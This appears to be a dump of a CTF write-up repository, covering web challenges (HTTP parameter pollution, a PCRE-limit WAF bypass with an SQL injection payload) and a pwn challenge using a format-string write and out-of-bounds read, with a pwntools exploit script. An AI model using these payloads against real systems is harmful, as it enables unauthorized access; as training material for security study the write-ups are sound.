├── .gitignore
├── 0xL4ughCTF2024
└── Web
│ ├── Micro
│ ├── Micro.assets
│ │ ├── image-20240210150920736.png
│ │ ├── image-20240210151741945.png
│ │ ├── image-20240210152301313.png
│ │ ├── image-20240210153313784.png
│ │ ├── image-20240210153458215.png
│ │ └── image-20240210155656417.png
│ ├── Micro_togive.zip
│ └── readme.md
│ └── Simple WAF
│ ├── Simple_Waf.assets
│ ├── image-20240210150920736.png
│ ├── image-20240210151741945.png
│ ├── image-20240210152301313.png
│ ├── image-20240210153313784.png
│ ├── image-20240210155656417.png
│ ├── image-20240210161715903.png
│ ├── image-20240210161719338.png
│ ├── image-20240210164046515.png
│ ├── image-20240210171848657.png
│ ├── image-20240210172104027.png
│ ├── image-20240210172317503.png
│ └── image-20240210172444303.png
│ └── readme.md
├── Aswan CTF 25
├── Finals
│ └── Pwn
│ │ ├── Baby Blue
│ │ ├── Readme.md
│ │ ├── baby_blue_player.zip
│ │ ├── challenge
│ │ │ ├── Dockerfile
│ │ │ ├── src
│ │ │ │ ├── .gdb_history
│ │ │ │ ├── baby_blue
│ │ │ │ ├── flag
│ │ │ │ ├── ld-linux-x86-64.so.2
│ │ │ │ └── libc.so.6
│ │ │ └── ynetd
│ │ ├── docker-compose.yml
│ │ ├── flag
│ │ ├── image-1.png
│ │ ├── image-2.png
│ │ ├── image-3.png
│ │ ├── image-4.png
│ │ ├── image.png
│ │ └── solve.py
│ │ └── Lucky
│ │ ├── Lucky_Player.zip
│ │ ├── Readme.md
│ │ ├── challenge
│ │ ├── Dockerfile
│ │ ├── src
│ │ │ ├── flag
│ │ │ ├── ld-linux-x86-64.so.2
│ │ │ ├── libc.so.6
│ │ │ └── lucky
│ │ └── ynetd
│ │ ├── docker-compose.yml
│ │ └── solve.py
└── Quals
│ └── Pwn
│ └── Elbareed Elmasry
│ ├── Dockerfile
│ ├── Elbareed_Elmasry_Player.zip
│ ├── Readme.md
│ ├── solve.py
│ ├── src
│ ├── .gdb_history
│ ├── Elbareed_Elmasry
│ ├── flag
│ ├── ld-linux-x86-64.so.2
│ └── libc.so.6
│ └── ynetd
├── BYUCTF 2025
└── pwn
│ └── Game of Yap
│ ├── .gdb_history
│ ├── chall.zip
│ ├── game-of-yap
│ ├── game-of-yap_patched
│ ├── ld-2.39.so
│ ├── libc.so.6
│ ├── readme.md
│ └── solve.py
├── CAT CTF23
├── Forensics
│ └── Revenge I
│ │ └── Readme.md
└── Web
│ └── Xss 3
│ └── readme.md
├── CSAW2024
└── quals
│ └── pwn
│ ├── mini-golfing
│ ├── .gdb_history
│ ├── golf
│ ├── golf_patched
│ ├── main.c
│ └── solve.py
│ ├── nix-philosophies
│ ├── .gdb_history
│ ├── chal
│ ├── chal_patched
│ ├── flag.txt
│ └── solve.py
│ └── vip_blacklist
│ ├── solve.py
│ └── vip_blacklist
├── CyCTF23
└── Web
│ └── CyVoting.md
├── CyCTF24
└── Pwn
│ └── CyParser
│ ├── cyparser
│ ├── image-1.png
│ ├── image.png
│ ├── libc.so.6
│ ├── readme.md
│ └── solve.py
├── DamCTF2025
└── Pwn
│ └── dnd
│ ├── dnd.zip
│ └── solver.py
├── FDC Universities CTF.ae
└── Pwn
│ ├── Internal Sandbox Service
│ ├── Ghidra_decompliation
│ ├── image-1.png
│ ├── image.png
│ ├── main
│ ├── readme.md
│ └── solve.py
│ └── No conventions
│ ├── .gdb_history
│ ├── Dockerfile
│ ├── docker-compose.yml
│ ├── hook.sh
│ ├── image-1.png
│ ├── image-2.png
│ ├── image.png
│ ├── main
│ ├── readme.md
│ ├── solve.py
│ └── ynetd
├── RandomScripts
└── phpinfo_race.py
├── Readme.md
├── Satoki24
└── Web
│ └── OSQLinj
│ └── readme.md
├── SekaiCTF2023
└── DFIR
│ └── Eval Me
│ └── readme.md
├── TAMU CTF 2023
└── web
│ ├── BlackBox
│ ├── Readme.md
│ └── black.zip
│ ├── Connect
│ ├── Readme.md
│ └── connect.zip
│ └── Migraine
│ ├── Readme.md
│ └── migraine.zip
├── THM
└── pwn101
│ ├── 108
│ ├── core
│ ├── pwn108-1644300489260.pwn108
│ ├── pwn108-1644300489260.pwn108_patched
│ └── solve.py
│ ├── 109
│ ├── .gdb_history
│ ├── core
│ ├── libc.so.6
│ ├── pwn109-1644300507645.pwn109
│ ├── pwn109-1644300507645.pwn109_patched
│ └── solve.py
│ └── 110
│ ├── .gdb_history
│ ├── core
│ ├── gadgets
│ ├── pwn110-1644300525386.pwn110
│ ├── pwn110-1644300525386.pwn110_patched
│ ├── solve.py
│ └── solve2.py
├── TJCTF25
├── pwn
│ ├── birds
│ │ ├── birds
│ │ ├── birds_patched
│ │ └── solve.py
│ ├── buggy
│ │ ├── .gdb_history
│ │ ├── chall
│ │ ├── chall.c
│ │ ├── chall_patched
│ │ └── solve.py
│ ├── extra-credit
│ │ ├── flag.txt
│ │ ├── gradeViewer
│ │ ├── gradeViewer_patched
│ │ ├── password_brute1.py
│ │ ├── password_brute2.py
│ │ └── solve.py
│ └── heroquest
│ │ ├── .gdb_history
│ │ ├── flag.txt
│ │ ├── heroQuest
│ │ ├── heroQuest_patched
│ │ └── solve.py
├── readme.md
└── web
│ └── double-nested
│ ├── image-1.png
│ ├── image-2.png
│ ├── image.png
│ ├── readme.md
│ └── src
│ ├── admin-bot.js
│ ├── app.py
│ └── index.html
├── squ1rrel_intro-to-pwn_repo
├── .gitpod.yml
├── LICENSE
├── README.md
├── pwn1
│ ├── .gdb_history
│ ├── main.c
│ ├── pwn1
│ └── solve.py
├── pwn2
│ ├── .gdb_history
│ ├── pwn2
│ └── solve.py
├── pwn3
│ ├── .gdb_history
│ ├── pwn3
│ └── solve.py
├── pwn4
│ ├── .gdb_history
│ ├── pwn4
│ └── solve.py
├── pwn5
│ ├── pwn5
│ └── solve.py
├── pwn6
│ ├── .gdb_history
│ ├── pwn6
│ └── solve.py
├── pwn7
│ ├── .gdb_history
│ ├── pwn7
│ └── solve.py
└── pwn8
│ ├── .gdb_history
│ ├── pwn8
│ └── solve.py
└── ångstromCTF
└── 2023
└── Web
├── Celeste Speedrunning Association
├── Readme.md
└── imgs
│ └── test
├── Readme.md
├── brokenlogin
├── Readme.md
├── adminbot.js
└── app.py
└── hallmark
├── Readme.md
└── dist.tar.gz
/.gitignore:
--------------------------------------------------------------------------------
1 | CSAW2024/finals/
2 | TJCTF25/pwn/birds/.gdb_history
3 | .gitignore
4 | TJCTF25/pwn/extra-credit/.gdb_history
5 |
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210150920736.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210150920736.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210151741945.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210151741945.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210152301313.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210152301313.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153313784.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153313784.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153458215.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210153458215.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210155656417.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro.assets/image-20240210155656417.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/Micro_togive.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Micro/Micro_togive.zip
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Micro/readme.md:
--------------------------------------------------------------------------------
1 | ## Micro web challenge writeup
2 |
3 | Micro is an easy code-review web challenge that shipped two files:
4 |
5 | - app.py
6 | - index.php
7 |
8 | With this description:
9 |
10 | ```ini
11 | Remember Bruh 1,2 ? This is bruh 3 : D
12 | login with admin:admin and you will get the flag :*
13 |
14 | > Author : abdoghazy
15 |
16 | [Link](http://20.115.83.90:1338 )
17 | ```
18 |
19 |
20 |
21 | #### index.php analysis:
22 |
23 | #### Login Function
24 |
25 | 
26 |
27 | - A simple login function: it takes the username, hashes the password, and passes the username to the `Check_Admin` function.
28 | - If `Check_Admin` returns true and the client IP address is not localhost, execution stops (`die`) and prints "Admin Login allowed from localhost only : )".
29 | - If that condition does not fire, the POST data is handed to the `send_to_api` function.
30 |
31 |
32 |
33 | #### Check_Admin function
34 |
35 | 
36 |
37 | - The string is normalized first, so that MySQL's own normalization/collation cannot be used to sneak an `admin` look-alike past the check.
38 | - It then checks, case-insensitively, whether the normalized string equals `admin`.
39 | - It returns true on a match and false otherwise.
40 |
41 |
42 |
43 | #### send_to_api function
44 |
45 | 
46 |
47 | - Forwards the POST data as-is to the internal API listening on localhost port 5000.
48 |
49 |
50 |
51 | #### app.py analysis:
52 |
53 | #### 
54 |
55 | - A plain Flask login route that checks whether the given `username` and `password` exist in the users table.
56 | - If the user exists, the application returns the flag.
57 |
58 |
59 |
60 | #### Solution :
61 |
62 | The solution should be clear now: the player has to get the `admin:admin` credentials past `Check_Admin` and into the internal API to receive the flag.
63 |
64 | The bug is an HTTP parameter-pollution mismatch: PHP and Flask (Werkzeug) resolve duplicate parameter names differently, and the same raw body is parsed by both.
65 |
66 | For a body like: parameter1=value1&parameter1=value2&parameter1=value3
67 |
68 | PHP's `$_POST` keeps the last occurrence, while Flask's `request.form['name']` / `.get()` returns the first (the remaining values are only reachable through `getlist()`).
69 |
70 | parameter1 in php -> value3
71 |
72 | parameter1 in flask -> value1
73 |
74 |
75 |
76 | So, if we send: username=admin&username=safe&password=admin&login-submit=
77 |
78 | PHP sees the last `username` (`safe`), so `Check_Admin` returns false and the localhost check never fires; the raw POST body is then forwarded unchanged to the internal API, which reads the first `username` (`admin`) and returns the flag. The root cause is passing one raw body through two parsers with different duplicate-key semantics — the fix is to re-serialize the already-parsed (and checked) values before forwarding, or to reject requests carrying duplicate keys.
79 |
80 | 
81 |
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210150920736.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210150920736.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210151741945.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210151741945.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210152301313.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210152301313.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210153313784.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210153313784.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210155656417.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210155656417.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161715903.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161715903.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161719338.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210161719338.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210164046515.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210164046515.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210171848657.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210171848657.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172104027.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172104027.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172317503.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172317503.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172444303.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/0xL4ughCTF2024/Web/Simple WAF/Simple_Waf.assets/image-20240210172444303.png
--------------------------------------------------------------------------------
/0xL4ughCTF2024/Web/Simple WAF/readme.md:
--------------------------------------------------------------------------------
1 | ## Simple WAF web challenge quick writeup
2 |
3 | Simple WAF is a medium code-review web challenge that shipped two files:
4 |
5 | - index.php
6 | - db.php
7 |
8 | With this description:
9 |
10 | ```ini
11 | i whitelisted input values so, i think iam safe : P
12 |
13 | > Author : abdoghazy
14 |
15 | [Link](http://20.115.83.90:1339/)
16 | ```
17 |
18 |
19 |
20 | #### index.php analysis:
21 |
22 | 
23 |
24 | - A simple login function: it takes the username, hashes the password, and passes the username to the `waf` function; if `waf` returns true, execution stops (`die`) and prints "WAF Block".
25 | - If `waf` returns false, the application interpolates our parameters directly into the query without any sanitization, which makes it vulnerable to SQL injection.
26 | - If the login query returns a row, the application returns the flag.
27 |
28 |
29 |
30 | #### waf function
31 |
32 | 
33 |
34 | - Uses `preg_match` with the regex `/([^a-z])+/s` on the input.
35 | - The regex matches one or more characters that are not lowercase `a-z`, so any input containing a character outside `a-z` is supposed to be blocked.
36 |
37 |
38 |
39 | #### Solution :
40 |
41 | The solution should be clear now: the player has to get past the `waf` function, inject into the SQL query, make it return a row, and collect the flag.
42 |
43 | The bug is in how the return value of PHP's `preg_match` is handled.
44 |
45 | `preg_match` and `preg_replace` are PCRE functions; according to the PHP documentation
46 |
47 | `preg_match` returns 1 if the pattern matched, 0 if it did not, and `FALSE` on failure (for example when a PCRE resource limit is hit). A check that only tests truthiness treats `FALSE` exactly like 0 — i.e. the filter fails open.
48 |
49 | 
50 |
51 | So, if we can make `preg_match()` fail, it returns `FALSE`, the `waf` treats that as "no match", and our input reaches the SQL query unfiltered.
52 |
53 | The regex can be pushed into exactly that failure. `([^a-z])+` repeats a capturing group once per input character, and PCRE has to track every iteration of the group, so a long enough run of non-`a-z` characters exhausts a PCRE limit instead of producing a match. (This is the same primitive as a ReDoS, but the goal here is an engine error, not a timeout.)
54 |
55 | Does that "one or more" have a limit? : D
56 |
57 | Yes — PHP's PCRE functions have limits by default: `pcre.backtrack_limit`, `pcre.recursion_limit`, and, when `pcre.jit` is enabled (the default since PHP 7.0), a fixed-size JIT stack. With only ~9000 characters the JIT stack limit is the likely one to trip, since that is far below the default backtrack limit; phpinfo() shows the configured values.
58 |
59 | 
60 |
61 |
62 |
63 | So we send a large run of characters the group matches (9000 underscores here) followed by the SQL payload; `preg_match()` fails, returns `FALSE`, and the `'||1#` payload reaches the query.
64 |
65 | ```python
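# Single shell line (the original listing wrapped it in the middle of 'password',
# which does not run when pasted). 9000 '_' characters trip the PCRE limit so
# preg_match() returns FALSE; the SQL payload '||1# is appended to the username.
python3 -c "print(__import__('requests').post('http://20.115.83.90:1339/',data={'username':'_'*9000+'\'||1#','password':'test','login-submit':''}).text)"|head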
68 |
69 | ```
70 |
71 |
72 |
73 | https://github.com/mybb/mybb/security/advisories/GHSA-pr74-wvp3-q6f5
74 |
75 | CVE-2023-41362
76 |
77 |
78 |
79 | #### A safer check — treat a PCRE failure as a block (fail closed):
80 |
81 | ```php
// Strict comparison against 0: anything other than "no match" blocks.
// (Logging preg_last_error() in the true branch makes engine failures visible.)
if(preg_match("/([^a-z])+/s",$input) !==0)
{
// Reached for 1 (a forbidden character matched) and for FALSE (a PCRE
// error such as a backtrack/JIT-stack limit): both block, so a regex
// engine failure can no longer be used to bypass the filter.
return true;
}
else
{
// Exactly 0: the input contained only a-z.
return false;
}
90 | ```
91 |
92 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/Readme.md:
--------------------------------------------------------------------------------
1 | ### Challenge Overview
2 |
3 | This challenge is a sequel to the "Elbareed Elmasry" challenge, featuring similar concepts with added complexity. The application includes basic functionalities such as **Register**, **Login**, **View Profile**, and **Admin Panel**.
4 |
5 | The goal is to exploit a short-length format string vulnerability to escalate permissions to `5`, granting access to the admin panel. Once inside, an out-of-bounds (OOB) read vulnerability in the admin panel can be leveraged to leak the flag from memory.
6 |
7 | All standard protections are enabled in this challenge.
8 |
9 | ---
10 |
11 | ### Solution Steps
12 |
13 | #### 1. **Calculating the Permissions Index**
14 |
15 | - Register a user with any username, log in, and set a breakpoint at the vulnerable `printf` function.
16 | - Print the stack and compute the distance from the stack pointer (`rsp`) at the `printf` call to the slot holding the permissions pointer. Divide by `8` (the slot size) and add `6`: on x86-64 SysV the format string is in `rdi` and the first five variadic arguments are in `rsi`, `rdx`, `rcx`, `r8`, `r9`, so `%6$p` is the first stack slot. This gives the index of the permissions pointer: `28`.
17 |
18 | Formula:
19 | `(Permissions address - Top of stack (rsp)) / 8 + 6 = 28`
20 |
21 | - To verify, leak the value at `%28$p`. This should reveal the heap address pointing to the permissions.
22 |
23 | Example Output:
24 | 
25 | 
26 | 
27 | 
28 |
29 | #### 2. **Overriding Permissions**
30 |
31 | - Use the `%n` specifier, which writes the number of characters printed so far into the `int` pointed to by the selected argument. For example:
32 | `AAA%28$n` writes `3` through the pointer at index `28` (three characters were printed before `%n`).
33 |
34 | - To set permissions to `5`, craft the payload accordingly:
35 | `AAAAA%28$n`.
36 |
37 | - After sending the payload, re-login with the same account and access the admin panel.
38 |
39 | #### 3. **Exploiting the OOB Read to Leak the Flag**
40 |
41 | - Once admin access is obtained, the flag is loaded into memory.
42 | - The admin panel takes a `user_id` and uses it as an index into the user list, but it only rejects indices greater than `7`; the index is signed and the lower bound is never checked.
43 |
44 | - By entering negative indices (e.g., `-1`, `-2`, `-3`) you read memory below the list, i.e. from the stack. The flag sits at index `-10`.
45 |
46 | Example Output:
47 | 
48 |
49 | ---
50 |
51 | ### Final Exploit Steps
52 |
53 | 1. Register and log in with the username: `"a"`.
54 | 2. Register and log in with the username: `"AAAAA%28$n"` to overwrite the first user's permissions.
55 | 3. Re-login with the username: `"a"`.
56 | 4. Access the admin panel.
57 | 5. Use the OOB read vulnerability to leak the flag from the stack.
58 |
59 | For the full exploit, refer to the [exploit script](./solve.py).
60 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/baby_blue_player.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/baby_blue_player.zip
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/Dockerfile:
--------------------------------------------------------------------------------
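FROM kalilinux/kali-rolling

# Unprivileged service account. No -m: the home directory is created by
# WORKDIR below and stays root-owned, so the process cannot write there.
RUN useradd -d /home/ctf/ -s /bin/bash ctf

WORKDIR /home/ctf/

# Challenge artefacts: the binary, the exact libc/loader it was linked
# against, the flag, and the ynetd listener that forks the binary per client.
COPY ./src/baby_blue .
COPY ./src/flag .
COPY ./src/libc.so.6 .
COPY ./src/ld-linux-x86-64.so.2 .
COPY ynetd .

# Everything root-owned and read-only for 'ctf': executables 555, flag 444
# (the intended solve reads the flag, so it must stay readable). One layer
# instead of six, and no bare `apt-get update` baking stale package lists
# into the image when nothing is installed.
RUN chown -R root:root . \
 && chmod 555 baby_blue libc.so.6 ld-linux-x86-64.so.2 ynetd \
 && chmod 444 ./flag

USER ctf
EXPOSE 8083
CMD ["./ynetd", "-p", "8083", "./baby_blue"]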
27 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/.gdb_history:
--------------------------------------------------------------------------------
1 | ls
2 | disass show_profile
3 | b *show_profile + 101
4 | r
5 | ni
6 | c
7 | r
8 | stack 20
9 | stack 30
10 | p 0x7fffffffdc70 - 0x7fffffffdbc0
11 | p 176 / 8
12 | p 22 + 6
13 | c
14 | c
15 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/baby_blue:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/baby_blue
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/flag:
--------------------------------------------------------------------------------
1 | YAO{REDACTED}
2 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/ld-linux-x86-64.so.2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/ld-linux-x86-64.so.2
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/src/libc.so.6
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/challenge/ynetd
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/docker-compose.yml:
--------------------------------------------------------------------------------
# Compose file for the Baby Blue pwn service. The `version` key is ignored
# by Compose v2 and only kept for the legacy `docker-compose` v1 client.
version: '3.8'

services:
  baby_blue:
    build:
      context: ./challenge
    ports:
      # No host IP given, so Docker publishes on every interface; use
      # "127.0.0.1:8083:8083" if the instance must not be reachable remotely.
      - "8083:8083"
    # Restart after crashes/reboots unless stopped by hand.
    restart: unless-stopped
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/flag:
--------------------------------------------------------------------------------
1 | YAO{REDACTED}
2 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-1.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-2.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-3.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image-4.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Baby Blue/image.png
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Baby Blue/solve.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 |
context.log_level = 'debug'
context.arch = 'amd64'
# Local copy of the binary the container serves.
BINARY = "./challenge/src/baby_blue"

# Parsed up front (independent of the transport choice below).
e = ELF(BINARY)

# `LOCAL=1` runs the binary under pwntools; otherwise talk to the docker instance.
if not args.LOCAL:
    r = remote("localhost", 8083)
else:
    r = process(BINARY)
14 |
15 |
16 | # gdb_script = """
17 | # b *send_letter+75
18 | # """
19 |
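def register(username):
    """Menu option 1: create a user named `username` (str or bytes).

    Sends bytes to the tube (pwntools warns on str and relies on the
    context encoding) and decodes the prompt with errors="replace" so a
    stray non-UTF-8 byte in the output cannot abort the exploit.
    """
    print("[*] Registering...")
    r.sendline(b"1")
    print("[*] Sending username...")
    # Blind recv() kept on purpose: it mirrors the challenge's prompt timing.
    print(r.recv().decode(errors="replace"))
    r.sendline(username if isinstance(username, bytes) else username.encode())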
26 |
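def login(username):
    """Menu option 2: log in as `username` (str or bytes).

    Waits for the login prompt before answering, then sends the name as
    bytes (pwntools warns when handed a str).
    """
    print("[*] Logging in...")
    r.sendline(b"2")
    r.recvuntil(b"Enter username to login:")
    r.sendline(username if isinstance(username, bytes) else username.encode())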
32 |
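def overwrite_permissions():
    """Menu option 3: view the profile.

    The profile printf()s the logged-in username as a format string, so a
    username such as `AAAAA%28$n` performs the write when this is called.
    The echoed profile may contain raw bytes, hence the tolerant decode.
    """
    print("[*] Overwriting permissions...")
    r.sendline(b"3")
    # r.recv()  # an extra read may be needed against the remote instance
    profile = r.recv()
    print(profile.decode(errors="replace"))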
39 |
40 |
41 |
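try:
    # gdb.attach(r, gdb_script)
    output = r.recvuntil(b"Exit\n>")
    print(output.decode(errors="replace"))

    # Victim account whose permissions field will be overwritten.
    register("1")
    print(r.recv().decode(errors="replace"))
    login("1")
    print(r.recv().decode(errors="replace"))

    # Attacker account: the username is the format string. %28$n writes the
    # number of characters printed so far (5) through the pointer at index 28.
    register("AAAAA%28$n")
    print(r.recv().decode(errors="replace"))
    login("AAAAA%28$n")
    overwrite_permissions()
    print(r.recv().decode(errors="replace"))

    # Back to the now-privileged account and into the admin panel.
    login("1")
    r.sendline(b"4")
    # Negative user_id: only the upper bound is checked, and index -10
    # lands on the flag buffer on the stack.
    r.sendline(b"-10")
    # Leaked bytes are not guaranteed to be UTF-8; ignore undecodable ones.
    print(r.clean(1).decode('utf-8', errors='ignore'))
except Exception as exc:
    print(f"[-] Error: {exc}")
finally:
    r.close()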
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/Lucky_Player.zip:
--------------------------------------------------------------------------------
